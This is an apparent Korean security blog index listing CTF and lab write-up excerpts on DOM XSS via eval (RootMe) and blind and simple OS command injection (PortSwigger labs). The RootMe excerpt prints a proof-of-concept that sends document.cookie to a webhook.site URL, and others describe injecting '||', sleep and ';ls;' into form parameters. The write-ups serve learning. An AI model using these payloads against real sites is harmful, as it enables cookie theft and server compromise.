반응형

wargame 13

RootMe - XSS DOM Based - Eval WriteUp

문제 풀이계산기 웹사이트 존재 사용자의 입력 값이 eval 함수 안에 삽입된 후 그 결과가 innerText로 들어가게 된다. 계산기 입력받는 값에서 정규식이 존재( /^\d+[\+|\-|\*|\/]\d+/)1. 숫자로 시작2. 숫자뒤에 +, -, *, / 와야 함3. 계산식 뒤에 숫자가 와야 함 위 정규식에 허점이 존재, 1+1 다음에 아무런 값이 올 수 있음 eval에서 ,를 사용해서 여러개의 자바스크립트 코드 실행이 가능하다. POC아래 코드 실행 시 webhook사이트로 cookie값을 전송할 수 있다.eval(1+1, location.href="https://webhook.site/a0a45cf9-b23f-44e7-a80c-0744cad0a729?c=".concat`${document.cooki..

WEB hacking/rootme 2025.02.19

Lab: Blind OS command injection with out-of-band interaction 문제 풀이(WriteUp)

문제 설명Command Injeciton을 통해 Burp Collaborator에 DNS 조회문제 풀이문제 접속 후 Submit feedback 접근 피드백 양식에 맞춰 작성 후 요청 피드백 요청 시 email 파라미터에 || 후 Command 명령어를 삽입하여 DNS 질의DNS 질의시 test. 추가하여 앞에 데이터를 전송할 수 있음 burp Collaborator 확인 시 요청 응답 성공 확인

Lab: Blind OS command injection with time delays 문제 풀이(WriteUp)

문제 설명 Blind OS Command Injection을 통해 명령어를 실행하여 10초 지연하면 문제 해결 문제 풀이문제 접속 화면 피드백 작성 후 요청 피드백 요청 패킷 확인시 응답 값에 아무런 값도 반환되지 않음 email 파라미터에 '(싱글쿼터) 삽입 시 500 에러 발생 email 파라미터에 || 를 통해 sleep 명령어 삽입 시 명령어 작동sleep 1 명령어를 사용하여 1초 지연 sleep 5 명령어를 사용하여 5초 지연하여 문제 해결

Lab: OS command injection, simple case 문제 풀이(WriteUp)

문제 설명OS Command Injection을 통해 whoami 명령어를 사용하면 문제 해결 가능 문제 풀이문제 접속 화면 메인 페이지에서 View details 접속 후 재고 확인 시 남은 재고 출력 재고확인 요청 패킷에서 productId, storeId 파라미터 요청 파라미터에 '(싱글 쿼터) 삽입 시 에러 발생, 에러를 통해 사용자의 입력 값이 Command 명령어에 사용됨을 확인 storeId 파라미터에 ;ls; 명령어를 사용하여 추가적인 Command 공격 사용, 그 결과 응답 값에 ls 명령어의 결과가 반환됨 cat 명령어를 통해 stockreport.sh 파일을 확인한 결과 $1, $2를 통해 2개의 인자를 받고 있음$1은 productId, $2는 storeId임을 추측 가능 인자를 받..

반응형